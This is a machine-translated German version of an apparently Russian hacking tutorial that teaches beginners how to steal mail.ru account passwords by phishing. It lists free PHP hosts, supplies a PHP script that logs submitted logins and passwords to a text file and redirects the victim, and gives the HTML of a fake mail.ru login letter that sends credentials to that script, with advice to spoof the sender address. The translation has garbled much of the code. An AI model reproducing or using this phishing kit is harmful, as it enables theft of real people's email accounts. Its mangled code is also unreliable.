This page has been robot translated, sorry for typos if any. Original content here.

Hacking Mail auf mail.ru [SI]

[::. INTRO. ::]

Hallo! In diesem Artikel werde ich darüber sprechen, wie man ein Postfach auf dem kostenlosen Mail-Dienst mail.ru hackt.

Der Artikel richtet sich an Anfänger, an die SI , sowie an jeden Internetnutzer, der auf das Konto eines anderen zugreifen möchte.

Aber okay, ich werde nicht lange darüber schreiben und es ist klar, "warum ein Postfach für einen Cracker notwendig ist, Sie werden es verstehen.

Der Artikel passt für Anfänger. Guru bitte nicht lesen :)

[::. VORBEREITUNG. ::]

Zu Beginn benötigen wir ein kostenloses (besser bezahltes) Hosting mit PHP- Unterstützung.

* Stellen Sie nur sicher, dass das Hosting PHP unterstützt

Sie können sich auf einer dieser:

 nextmail.ru 
 hobby.ru 
 webrise.ru 
 lapin.ru 
 free.dl-hosting.ru 
 hostow.net 
 beplaced.ru 
 777host.ru 
 paltus.ru 
 wonderhost.ru 
 freebox.de 
 alfaspace.net 
 k70.ru 
 hosting.promostudio.ru 
 chat.ru 
 maxhost.ru 
 nixup.de 
 e2e.ru 
 noka.ru 
 newmail.ru 
 boom.ru 
 h15.ru 
 hütte.ru 
 jino-net.ru 
 pochta.ru 
 unlimhost.ru 
 onepage.ru 
 by.ru 
 sbn.bz 
 yard.ru 
 domehosehosting.ru 
 orthodoxy.ru 
 webservis.ru 
 ru-web.de 
 activehost.ru 
 househost.ru 
 bestof.ru 
 addr.ru 
 hosting.dump.ru 
 pesni.ru 
 medbox.de 
 fatal.ru 
 x5x.ru 
 hopshot.de 
 5gigs.com 
 wagoo.com 
 orgfree.com 
 awardspace.com 
 bobos.de 
 www.host.sk 
 zportal.info 
 spaceall.de 
 3x.ro 
 sretenie.ru 
 dotgeek.de 
 sevhosting.net 
 o2g.net
 www.jino-net.ru
 www.nixup.com
 newmail.ru
 ho.com.ua
 wallSt.ru
 hütte.ru
 holm.ru
 e2e.ru
 fatal.ru
 host.sk
 ut.ru
 H1.ru
 Hostmos.ru
 Webm.ru
 Rdcom.ru
 narod.ru
 front.ru
 nm.ru 
 chat.ru 
 boom.ru 
 by.ru

Registriert? - Lass uns weiter gehen!

Was brauchen wir?

Zuerst benötigen wir einen Sniffer (dies ist ein Skript, mit dem Sie die empfangenen Daten in eine Textdatei speichern können).


PHP-Code:
  <? php
 
  $ f = fopen ( "mail.txt" , "at" );
  # Datei, wo die Herde gespeichert werden soll ( $ f , 2 );
  fputs ( $ f , $ _GET [ 'Login' ]. "@" );
  # login fputs ( $ f , $ _GET [ 'Domäne' ]);
  # domain fputs ( $ f , ";" . $ _GET [ 'Passwort' ]. "\ n" );
  # Passwort Flock ( $ f , 3 );
  fclose ( $ f );
  ?> <script> document.location.href = "/click?http://win.mail.ru/cgi-bin/readmsg?id=121112312"; </ script>

Betrachten Sie das Skript genauer.


PHP-Code:
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>

Diese Zeile gibt den Ort an, an den wir den Benutzer nach der Autorisierung auf der Brief-Fälschung umleiten werden.

  • Wir speichern mes.php in der Datei und füllen sie mit Hosting.
  • Erstellen Sie außerdem die mail.txt-Datei in dem Verzeichnis mit dem Skript, und legen Sie es auf der rechten Seite (chmod) 777.

Vielleicht mit Hosting - alles!

Lasst uns zu dem Brief weitergehen, den wir dem Opfer auf Seife schicken werden.


Code des Briefes:
  < table class = readlet cellpadding = 0 Zellenabstand = 0 border = 0 width = "100%" > < tr >
 
  < td id = aj_body >
 
  < div id = let_body > < base href = "http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg" >
 
  < cellpadding = 0 cellspacing = 0 border = 0 class = login >
 
  < tr >
 
  < td > Der Benutzer hat Ihnen einen versteckten Brief geschickt . <br> Um die E-Mail anzuzeigen, geben Sie Ihren Benutzernamen und Ihr Passwort ein . <br> </ a > </ p > </ td >
 
  </ tr >
 
  </ table > < font color = 00 ;
  33 ;
  66 GESICHT = "Arial" >
 
  < h4 > Autorisierung </ h4 >
 
  </ font >
 
  < cellpadding = 0 cellspacing = 0 border = 0 class = login >
 
  < form method = "GET" action = "http: // Adresskarte /mes.php" >
 
  < input type = "hidden" name = "mail" value = "1" >
 
  < tr >
 
  < td width = 75 >
 
  < img src = http : //img.mail.ru/0.gif height = 1> <br> Name
 
  </ td >
 
  < td width = 150 >
 
  < Eingabetyp = "Text" Name = "Login" >
 
  </ td >
 
  < td width = 75 >
 
  < select name = "Domäne" >
 
  < option value = "mail.ru" AUSGEWÄHLT > @ mail .
  com </ option >
 
  < optionswert = "inbox.ru" > @ inbox .
  com </ option >
 
  < optionswert = "list.ru" > @list.
  com </ option >
 
  < optionswert = "bk.ru" > @ bk .
  com </ option >
 
  </ select >
 
  </ td >
 
  </ tr >
 
  < tr >
 
  < td >
 
  Passwort
 
  </ td >
 
  < td >
 
  < Eingabetyp = "Passwort" Name = "Passwort" >
 
  </ td >
 
  < td >
 
  <a href = "http://www.mail.ru/pages/help/92.html" target = _new> Passwort vergessen ? </ a >
 
  </ td >
 
  </ tr >
 
  < tr >
 
  < td > </ td >
 
  < td >
 
  < Eingabetyp = Kontrollkästchen Name = "Level" Wert = 1 ID = "Alien" > < Label für = "Alien" > Alien Computer </ Label >
 
  </ td >
 
  < td > </ td >
 
  </ tr >
 
  < tr >
 
  < td > </ td >
 
  < td >
 
  < input type = "Submit" value = " Anmelden " xstyle = "margin-top: 4px" >
 
  </ td >
 
  < td > </ td >
 
  </ tr > </ form >
 
  </ table > <br> <br>
 
  Um mehr über Services zu erfahren, besuchen Sie <a href = "http://corp.mail.ru" target = "_blank"> Corp.
  E-Mail .
  Ru </ a > <br>
 
  Nationaler Postdienst <a href = "http://www.mail.ru" target = "_blank"> @ Mail .
  ru </ a > - die beste kostenlose Mail .
 
  < base > </ div >
 
 

Geben Sie im action-Parameter das form- Tag an - die Adresse Ihrer Seite (die Sie oben registriert haben) und den Pfad zum mes.php-Sniffer .

[!] Es ist nötig zu beachten, dass die Daten mit der Methode "GET" übergeben werden sollen! Sonst wird nichts daraus werden.

Jetzt bleibt es, dem Opfer einen Brief zu schicken, vorzugsweise mit der Ersetzung der Adresse .

Wir kopieren den Code des Briefes in das Eingabefeld und senden ihn im HTML-Format, nachdem wir die Felder ausgefüllt haben.

Wenn das Opfer darauf beißt, dann hast du Glück :)

Sie können die Passwörter in der Datei mail.txt herausfinden .

[::. ENDE. ::]

Ich denke alles.

Und wie man sich dem Einbruch nähert, um für Sie zu lösen.

Vielen Dank für Ihre Aufmerksamkeit!

Ich erwarte dein Feedback direkt unter diesem Text.

Und es ist besser, nichts zu brechen;)

Auf Wiedersehen und bis bald :)